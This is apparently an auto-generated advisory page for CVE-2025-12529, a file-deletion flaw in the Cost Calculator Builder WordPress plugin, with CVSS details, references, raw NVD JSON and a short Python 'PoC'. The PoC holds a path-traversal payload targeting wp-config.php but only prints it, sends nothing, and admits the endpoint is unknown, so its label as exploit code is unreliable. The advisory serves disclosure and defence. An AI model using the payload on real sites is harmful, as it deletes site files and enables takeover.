Security Vulnerability Report
CVE-2025-12529 CVSS 8.8 HIGH

CVE-2025-12529

Published: 2025-12-02 03:16:16
Last Modified: 2026-04-15 00:35:42

Description

The Cost Calculator Builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the deleteOrdersFiles() function in all versions up to, and including, 3.6.3. This makes it possible for unauthenticated attackers to inject arbitrary file paths into the orders that are removed, when an administrator deletes them. This can lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability requires the Cost Calculator Builder Pro version to be installed along with the free version in order to be exploitable.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cost Calculator Builder (free version) < 3.6.4
Cost Calculator Builder Pro < 3.6.4
All versions up to 3.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json

# CVE-2025-12529 PoC - Arbitrary File Deletion
# WordPress Cost Calculator Builder < 3.6.4

target_url = "http://target-wordpress-site.com"


# Step 1: Identify WordPress and Cost Calculator Builder
def check_vulnerability():
    """
    Check if target is vulnerable to CVE-2025-12529
    This requires Cost Calculator Builder plugin (free + pro) installed
    """
    # Step 2: Inject malicious file path into order
    # The deleteOrdersFiles() function will delete arbitrary files
    # Payload to delete wp-config.php
    payload = {
        "order_data": {
            "file_path": "../../../../wp-config.php",
            "filename": "wp-config.php"
        }
    }
    # This would typically be done through the plugin's order submission endpoint
    # The exact endpoint depends on the plugin's REST API routes
    print("CVE-2025-12529 - Arbitrary File Deletion PoC")
    print("Target: " + target_url)
    print("Payload: " + json.dumps(payload))
    print("Note: Requires admin interaction to trigger file deletion")


if __name__ == "__main__":
    check_vulnerability()

References

Weakness: CWE-73

https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L262
https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L513
https://www.wordfence.com/threat-intel/vulnerabilities/id/4154684d-3f9b-418f-b9d1-a5d22d4d84d3?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12529",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-02T03:16:15.657",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Cost Calculator Builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the deleteOrdersFiles() function in all versions up to, and including, 3.6.3. This makes it possible for unauthenticated attackers to inject arbitrary file paths into the orders that are removed, when an administrator deletes them. This can lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability requires the Cost Calculator Builder Pro version to be installed along with the free version in order to be exploitable."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-73"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L262",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L513",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4154684d-3f9b-418f-b9d1-a5d22d4d84d3?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}